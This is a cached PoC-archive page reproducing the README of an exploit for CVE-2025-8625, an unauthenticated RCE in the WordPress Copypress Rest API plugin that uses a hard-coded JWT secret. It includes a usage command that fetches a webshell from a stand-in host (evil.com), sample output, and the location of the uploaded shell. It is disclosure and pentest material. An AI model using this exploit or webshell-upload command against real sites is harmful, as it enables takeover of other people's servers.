CVE-2025-8625 PoC — WordPress plugin Copypress Rest API 安全漏洞

Source

https://github.com/Nxploited/CVE-2025-8625

Associated Vulnerability

Title:WordPress plugin Copypress Rest API 安全漏洞 (CVE-2025-8625)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台具有在基于PHP和MySQL的服务器上架设个人博客网站的功能。WordPress plugin是一个应用插件。 WordPress plugin Copypress Rest API 1.1版本至1.2版本存在安全漏洞，该漏洞源于使用硬编码JWT签名密钥且未限制可获取和保存的文件类型，可能导致远程代码执行。

Description

Copypress Rest API 1.1 - 1.2 - Missing Configurable JWT Secret and File-Type Validation to Unauthenticated Remote Code Execution

Readme

# CVE-2025-8625
Copypress Rest API 1.1 - 1.2 - Missing Configurable JWT Secret and File-Type Validation to Unauthenticated Remote Code Execution
# 🛡️ Copypress Rest API 1.1 - 1.2 RCE Exploit

## 📝 Description

The Copypress Rest API plugin for WordPress (versions 1.1 to 1.2) is vulnerable to **Remote Code Execution** via the `copyreap_handle_image()` function.  
The plugin uses a hard-coded JWT signing key when no secret is set and does not validate file types, allowing unauthenticated attackers to forge tokens and upload arbitrary files (such as PHP shells) through the image handler endpoint.

- **CVE:** CVE-2025-8625  
- **CVSS:** 9.8 (Critical)

---

## 🚀 Script Overview

**Script name:** `CVE-2025-8625.py`  
This Python script automates exploitation of the vulnerability, allowing you to generate a valid JWT, send a crafted request, and upload a malicious file (webshell) to the vulnerable WordPress site.

---

## ⚙️ Usage

```bash
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
```

- `-u` / `--url`: Target WordPress site URL
- `-shell` / `--shell`: Direct link to your webshell or malicious PHP file

**Example output:**
```
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.
```

---

## 🏆 Features

- Generates a valid JWT using the plugin's hardcoded secret
- Bypasses authentication to upload arbitrary files
- Provides clear output for success/failure of exploitation
- Simple command-line interface

---

## 📂 Shell Upload Location

**Shell uploaded successfully! 🎉**  
Shell path example:

```
https://target.com/wp-content/uploads/2025/10/shell.php
```

---

## ⚠️ Disclaimer

This tool is for **educational and authorized penetration testing** purposes only.  
Usage against targets without explicit permission is illegal.

---

***By: Nxploited (Khaled Alenazi)***

File Snapshot


 [4.0K]  /data/pocs/48cd20fbf40e540570ec43376a45aaadb8d8f563
├── [2.6K]  CVE-2025-8625.py
├── [1.5K]  LICENSE
├── [1.9K]  README.md
└── [  17]  requirements.txt

1 directory, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!